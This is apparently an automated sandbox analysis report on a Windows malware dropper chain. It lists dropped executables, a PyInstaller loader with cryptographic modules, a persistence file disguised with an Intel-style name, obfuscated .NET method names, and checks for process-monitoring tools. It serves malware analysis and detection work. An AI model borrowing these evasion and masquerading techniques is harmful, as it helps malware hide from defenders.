Source: EkmIhQM.exe.4.dr, VBRazorCodeGenerator.cs	High entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'VisitSpan', 'VisitSpan', 'sLxMjNALAI2RlRi0olh', 'dkW8pdA1TK9cRLeteZt', 'Y5tXI8AsTfUh0KgSoBW', 'qJplEpAwSkGCvLbyegV', 'mUhrm9AfWxhBJQiLEGN', 'Ym3nYEAuEOEetj2DyGe'
Source: EkmIhQM.exe.4.dr, CSharpRazorCodeGenerator.cs	High entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'yG1QaADj7wvODb4R9Ik', 'd6tM4oD0ALikI0mBP1P', 'PxiMEIDIAh2HAaxnBpo', 'HHsAW5DRdLg5k7MCAvO', 'Y9HGhrD8BZm7MS16QWT', 'sjbUU7Dvx64aDrCrRvI', 'MW2uJODrT91fvpeRiGN', 'evonwuDNHg5qXDBZDDo'
Source: EkmIhQM.exe.4.dr, RazorCodeGenerator.cs	High entropy of concatenated method names: 'ynePkGbbNEJSgWIvwf7', 'of7fdpbDCbvdXPU4ysL', 'VisitSpan', 'MarkStartGeneratedCode', 'MarkEndGeneratedCode', 'ResetBuffer', 'IsContentSpan', 'gfNap7bay30SZRE07xu', 'WolnGVbYWX7WcIBj6Fw', 'EyPTrObAcKGIyPGp2LL'
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	High entropy of concatenated method names: 'Q5MkM5QYd3', 'qDhjp4lmAjYcpcwFN1v', 'HBBFPFl5dykXMmDGX1N', 'SF0FMLlgCdI8XwcjsEo', 'Gdr5FIlJcSjrgL6GUlc', 'fHSkdAnkJf', 'k96k7mkjK6', 't26kG3LxyN', 'WBQk3NCaKd', 'AgYkLp4qOr'
Source: EkmIhQM.exe.4.dr, ParserContext.cs	High entropy of concatenated method names: 'GUeVUnaGvdQ7Eoj5vYg', 'IPru3mayWROE934fN9y', 'StartTemporaryBuffer', 'AcceptTemporaryBuffer', 'AcceptCurrent', 'Append', 'OutputSpan', 'ResumeSpan', 'StartBlock', 'PushVisitor'
Source: EkmIhQM.exe.4.dr, ParserBase.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'IsAtTransition', 'NextIsTransition', 'ParseBlock', 'StartBlock', 'StartBlock', 'EndBlock', 'Output', 'OnError'
Source: EkmIhQM.exe.4.dr, HtmlMarkupParser.cs	High entropy of concatenated method names: 'sUVFd9A03p1SINum7Og', 'BmdB6aAILou36sw1IDJ', 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseSection', 'ParseDocument', 'ParseRootBlock', 'ParseBlock', 'IsStartTag', 'IsEndTag'
Source: EkmIhQM.exe.4.dr, VBCodeParser.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseBlock', 'TryAcceptStringOrComment', 'HandleTransition', 'HandleTransitionCore', 'HandleReservedWord', 'ParseHelperBlock', 'ParseImplicitBlock', 'ParseSectionStatement'
Source: EkmIhQM.exe.4.dr, CSharpCodeParser.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'TryRecover', 'ParseBlock', 'WrapSimpleBlockParser', 'HandleReservedWord', 'ParseInheritsStatement', 'ParseImplicitExpression', 'ParseImplicitExpression', 'ParseStatement'
Source: EkmIhQM.exe.4.dr, hrwN54ssk66JhR0d65a.cs	High entropy of concatenated method names: 'lLHifFIsCLsZtjvFfN0i', 'tsFkXCLB65', 'V2hk1qXaN6', 'iLd0d8WDP379kn9xhYl', 'HbuRd6WiEhZDXVplODc', 'YtFiFSWajlbN7lh75cO', 'xpQHYeWYVNv0F7qe2by', 'q1U0gcWALoo0nnYdTya', 'bPLigaWKwlSJZjPYq6A', 'uSI0PxWliFqjPtWleMu'
Source: EkmIhQM.exe.4.dr, VBOptionSpan.cs	High entropy of concatenated method names: 'Create', 'Equals', 'ToString', 'GetHashCode', 'fMpXkZCBAIh8evjsXOD', 'sc3MAMCecxSxotGHmBr', 'nSL9faCx8D8WGw0LJew', 'pZcyY1C2qBiFlTZI976', 'Q7vwxNCtNGqofUgifiE'
Source: EkmIhQM.exe.4.dr, Span.cs	High entropy of concatenated method names: 'Accept', 'ApplyChange', 'ApplyChange', 'CanAcceptChange', 'UpdateContent', 'OwnsChange', 'ToString', 'Equals', 'GetHashCode', 'TryMergeWith'
Source: EkmIhQM.exe.4.dr, NamespaceImportSpan.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'ToString', 'Create', 'hR8Tx3MALfcsYx5xHWL', 'B9CXJPMKLD0BKkeoGbd', 'fNOSr8MlJYZ2ywSoGbE', 'JGvNxdMWcpHKOMj00rj', 'dogBTaMGVp7jsdRiIEU', 'Ph4hPIMyFhLmGoeDpc9'

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe

Process created: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015359001\f11f18202b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32trace.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\LoaderClient[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32ui.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_win32sysloader.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32api.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_pytransform.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015365001\82bc687fc3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_poly1305.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info\LICENSE.txt

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
